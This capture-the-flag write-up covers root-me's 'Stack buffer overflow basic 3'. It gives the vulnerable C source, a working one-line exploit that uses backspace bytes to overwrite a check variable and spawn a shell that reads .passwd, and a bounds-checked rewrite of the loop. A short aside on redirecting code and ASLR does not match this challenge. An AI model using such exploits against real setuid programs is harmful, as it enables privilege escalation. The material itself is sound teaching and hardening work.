ELF x86: Stack buffer overflow basic 3
root-me challenge: An intermediate level to familiarize yourself with stack overflows.
Environment configuration:
  PIE   (Position Independent Executable)      No
  RelRO (Read Only relocations)                Yes
  NX    (Non-Executable Stack)                 Yes
  ASLR  (Address Space Layout Randomisation)   No
  SF    (Source Fortification)                 No
  SSP   (Stack-Smashing Protection)            No
  SRC   (Source code access)                   Yes
Source code:
    #include <stdio.h>
    #include <sys/time.h>
    #include <sys/types.h>
    #include <unistd.h>
    #include <stdlib.h>

    void shell(void);

    int main()
    {
        char buffer[64];
        int check;
        int i = 0;
        int count = 0;

        printf("Enter your name: ");
        fflush(stdout);
        while(1)
        {
            if(count >= 64)
                printf("Oh no...Sorry !\n");
            if(check == 0xbffffabc)
                shell();
            else
            {
                read(fileno(stdin),&i,1);
                switch(i)
                {
                    case '\n':
                        printf("\a");
                        break;
                    case 0x08:
                        count--;
                        printf("\b");
                        break;
                    case 0x04:
                        printf("\t");
                        count++;
                        break;
                    case 0x90:
                        printf("\a");
                        count++;
                        break;
                    default:
                        buffer[count] = i;
                        count++;
                        break;
                }
            }
        }
    }

    void shell(void)
    {
        setreuid(geteuid(), geteuid());
        system("/bin/bash");
    }
The loop only tests count >= 64 (and even then just prints a message); there is no lower bound. Four 0x08 bytes therefore decrement count to -4, and the next four default-case bytes are stored at buffer[-4..-1], which is where the check variable sits on the stack. Written in little-endian order, \xbc\xfa\xff\xbf sets check to 0xbffffabc and shell() is called. The trailing "-" keeps stdin open so the spawned shell can be used; the cat command is typed inside it:

    app-systeme-ch16@challenge02:~$ cat <(python -c "print '\x08'*4 + '\xbc\xfa\xff\xbf'") - | ./ch16
    cat .passwd
Counter moves
Here the overflow redirects into chosen code. ASLR makes the target address hard to predict. Defenders' notes on this are under memory corruption and its limits.
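Added example (not the challenge's code): the same input loop rewritten with both bounds checked. The original only tests count >= 64 after the fact, so a backspace can push the index negative and the default case then writes below buffer[]. Clamping count to 0..64 on every move and every store means neither direction can reach an adjacent stack slot such as check. The names input_state, consume_byte, feed, refused_for and final_index_for, and the constructed inputs, are this example's own.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 64

/* Hypothetical hardened state for the ch16 input loop (example only). */
struct input_state {
    char buffer[BUF_SIZE];
    int  count;     /* next write position, kept in 0..BUF_SIZE */
    int  refused;   /* bytes dropped by the bounds checks */
};

/* Apply one input byte with the same control characters as the challenge;
 * returns 1 if the byte was accepted, 0 if a bounds check refused it. */
int consume_byte(struct input_state *st, unsigned char c)
{
    switch (c) {
    case '\n':                   /* bell only, cursor does not move */
        return 1;
    case 0x08:                   /* backspace: never below index 0 */
        if (st->count > 0) {
            st->count--;
            return 1;
        }
        break;
    case 0x04:                   /* skip forward without writing */
    case 0x90:
        if (st->count < BUF_SIZE) {
            st->count++;
            return 1;
        }
        break;
    default:                     /* store only inside the array */
        if (st->count < BUF_SIZE) {
            st->buffer[st->count++] = (char)c;
            return 1;
        }
        break;
    }
    st->refused++;
    return 0;
}

/* Feed a whole byte sequence into a fresh state. */
void feed(struct input_state *st, const unsigned char *data, size_t len)
{
    memset(st, 0, sizeof *st);
    for (size_t k = 0; k < len; k++)
        consume_byte(st, data[k]);
}

/* Wrappers returning the two values worth checking. */
int refused_for(const unsigned char *data, size_t len)
{
    struct input_state st;
    feed(&st, data, len);
    return st.refused;
}

int final_index_for(const unsigned char *data, size_t len)
{
    struct input_state st;
    feed(&st, data, len);
    return st.count;
}

/* Constructed inputs: the page's payload (four backspaces, then four bytes),
 * a normal edit sequence, and a 70-byte run that overruns the 64-byte buffer. */
static const unsigned char PAYLOAD[] = { 0x08, 0x08, 0x08, 0x08, 0xbc, 0xfa, 0xff, 0xbf };
static const unsigned char NORMAL[]  = { 'A', 'B', 0x08, 'C' };
static const unsigned char LONG_INPUT[] =
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

int main(void)
{
    struct input_state st;
    feed(&st, PAYLOAD, sizeof PAYLOAD);
    /* The four backspaces are refused, so the address bytes land at
     * buffer[0..3] instead of on check. */
    printf("refused=%d final_index=%d first_byte=0x%02x\n",
           st.refused, st.count, (unsigned char)st.buffer[0]);
    return 0;
}
```

With the page's payload the four backspaces are refused at index 0 and the address bytes land harmlessly at buffer[0..3]; the 70-byte run stores 64 bytes and drops the remaining 6 rather than walking past the end of the array.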